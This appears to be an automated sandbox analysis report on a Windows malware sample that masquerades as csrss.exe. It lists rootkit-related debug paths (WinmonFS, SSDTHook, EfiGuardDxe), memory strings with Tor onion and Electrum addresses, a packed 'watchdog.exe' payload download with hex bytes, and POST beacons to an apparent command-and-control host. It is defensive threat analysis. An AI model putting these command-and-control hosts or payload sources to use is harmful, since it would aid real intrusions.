Source:	Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: The module signature does not match with .pdb signature. source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
Source:	Binary string: .pdb.dbg source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
Source:	Binary string: '(EfiGuardDxe.pdbx source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
Source:	Binary string: symsrv.pdbGCTL source: 1dyvctHqv1.exe, 00000000.00000002.297655834.0000000000C55000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.309245222.00000000062A3000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.334492688.0000000006803000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.407197925.0000000000C55000.00000040.00020000.sdmp, csrss.exe, 00000021.00000003.364615971.0000000006803000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.404493397.0000000000C55000.00000040.00020000.sdmp
Source:	Binary string: or you do not have access permission to the .pdb location. source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
Source:	Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
Source:	Binary string: EfiGuardDxe.pdb source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
Source:	Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7,10x32\Release\win7x32.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: Signature does not matchThe module signature does not match with .pdb signature source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
Source:	Binary string: dbghelp.pdb source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
Source:	Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win10x64\x64\Release\SSDTHook.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: dbghelp.pdbGCTL source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp

Networking:

Found Tor onion address

Show sources

Source: 1dyvctHqv1.exe, 00000000.00000002.299005665.0000000004FE0000.00000040.00000001.sdmp	String found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: 1dyvctHqv1.exe, 0000000C.00000002.324236877.0000000000400000.00000040.00020000.sdmp	String found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: csrss.exe, 00000011.00000002.555649640.0000000005700000.00000040.00000001.sdmp	String found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: csrss.exe, 0000001F.00000003.374222629.0000000005FB0000.00000004.00000001.sdmp	String found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: csrss.exe, 00000021.00000003.362473269.0000000005FB0000.00000004.00000001.sdmp	String found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	String found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 11 Nov 2021 19:35:48 GMTContent-Type: application/octet-streamContent-Length: 2102272Connection: keep-alivecontent-disposition: attachment; filename=watchdog.exeetag: "616ea494-201400"last-modified: Tue, 19 Oct 2021 10:57:24 GMTCache-Control: max-age=3600CF-Cache-Status: HITAge: 2147Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IZbZWdjamI%2BOlW6zrBCfymBq%2F3EM7AYENiKBU5VEfeBk8QwcSprlzIdARZfp9OhwkDRq0Hl79ZYMAk3bYiIZL5RRTbInTH8PueogXJMbnQaAbXXgXKMt2qHIOXr8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 6ac9f742f94b4e19-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 00 00 00 00 00 b4 4b 00 00 00 00 00 e0 00 03 03 0b 01 03 00 00 10 20 00 00 10 00 00 00 70 2d 00 00 8d 4d 00 00 80 2d 00 00 90 4d 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 a0 4d 00 00 10 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 90 4d 00 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 70 2d 00 00 10 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 10 20 00 00 80 2d 00 00 10 20 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 55 50 58 32 00 00 00 00 00 10 00 00 00 90 4d 00 00 02 00 00 00 12 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELK p-M-M@MMUPX0p-UPX1 - @UPX2M @

Source: global traffic	HTTP traffic detected: POST /api/poll HTTP/1.1Host: server3.trumops.comUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/80.0.3987.87 Chrome/80.0.3987.87 Safari/537.36Content-Length: 652Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: POST /api/poll HTTP/1.1Host: server3.trumops.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0Content-Length: 668Accept-Encoding: gzip

Source: csrss.exe	String found in binary or memory: http://archive.org/details/archive.org_bot)Mozilla/5.0
Source: csrss.exe	String found in binary or memory: http://builtwith.com/biup)
Source: 1dyvctHqv1.exe, 00000000.00000002.298174176.0000000004BC5000.00000040.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.326226271.0000000004D87000.00000040.00000001.sdmp, csrss.exe, 00000011.00000002.554922240.0000000005200000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000002.408273398.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000021.00000002.406886356.0000000005200000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.406346781.0000000005200000.00000040.00000001.sdmp	String found in binary or memory: http://crl.g
Source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000003.374819187.000000000638A000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000003.375600027.000000000638A000.00000004.00000001.sdmp, csrss.exe, 00000032.00000002.439042588.00000000009F9000.00000040.00020000.sdmp	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000003.374819187.000000000638A000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000003.375600027.000000000638A000.00000004.00000001.sdmp, csrss.exe, 00000032.00000002.439042588.00000000009F9000.00000040.00020000.sdmp	String found in binary or memory: http://crl.globalsign.net/Root.crl0
